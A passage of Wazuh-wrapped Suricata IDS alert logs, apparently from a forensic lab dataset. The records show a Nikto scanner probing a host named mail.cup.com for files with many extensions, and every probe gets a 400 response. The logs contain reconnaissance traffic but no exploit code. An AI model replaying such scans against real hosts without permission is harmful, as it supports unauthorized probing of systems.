METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.tmp","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.527247+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":58,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.93777","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.527247+0000\",\"flow_id\":46888141850715,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47052,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.CGI\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.527247+0000","flow_id":"46888141850715.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47052","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.CGI","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.529238+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":59,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.95311","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.529238+0000\",\"flow_id\":314112417075197,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47054,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.ASP\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.529238+0000","flow_id":"314112417075197.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47054","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.ASP","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.531898+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":60,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.96847","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.531898+0000\",\"flow_id\":484214596835423,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47056,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.cnf\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.531898+0000","flow_id":"484214596835423.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47056","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.cnf","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.534133+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":61,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.98383","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.534133+0000\",\"flow_id\":987915476410983,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47058,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.config~\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.534133+0000","flow_id":"987915476410983.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47058","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.config~","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.536596+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":62,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.99927","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.536596+0000\",\"flow_id\":830771212987548,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47060,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.vts\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.536596+0000","flow_id":"830771212987548.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47060","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.vts","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.538865+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":63,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.101463","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.538865+0000\",\"flow_id\":2145323263342098,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47062,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.bak\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.538865+0000","flow_id":"2145323263342098.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47062","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.bak","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.541676+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":64,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.103002","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.541676+0000\",\"flow_id\":2236672922763369,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47064,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.se\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.541676+0000","flow_id":"2236672922763369.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47064","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.se","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.543712+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":65,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.104539","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.543712+0000\",\"flow_id\":2.23652689387752e+15,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47066,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.js\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.543712+0000","flow_id":"2236526893877520.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47066","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.js","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.546419+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":66,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.106080","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.546419+0000\",\"flow_id\":565934939591600,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47068,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.pl\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.546419+0000","flow_id":"565934939591600.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47068","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.pl","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.549896+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":67,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.107615","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.549896+0000\",\"flow_id\":203104692363407,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47070,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.iso2022-jp\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.549896+0000","flow_id":"203104692363407.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47070","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.iso2022-jp","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.553708+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":68,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.109166","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.553708+0000\",\"flow_id\":1482309161872368,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47072,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.es\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.553708+0000","flow_id":"1482309161872368.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47072","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.es","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.556583+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":69,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.110703","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.556583+0000\",\"flow_id\":993915545746050,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47074,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.utf8\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.556583+0000","flow_id":"993915545746050.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47074","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.utf8","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.570703+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":70,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.112242","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.570703+0000\",\"flow_id\":304066488610493,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47076,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.php=\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.570703+0000","flow_id":"304066488610493.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47076","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.php=","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.575638+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":71,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.113781","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.575638+0000\",\"flow_id\":1484675688873005,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47078,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.dk\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.575638+0000","flow_id":"1484675688873005.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47078","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.dk","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.578131+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":72,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.115318","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.578131+0000\",\"flow_id\":1753841289317738,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47080,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.php4\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.578131+0000","flow_id":"1753841289317738.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47080","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.php4","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.581866+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":73,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.116859","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.581866+0000\",\"flow_id\":1.17482386324625e+15,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47082,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.sh\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 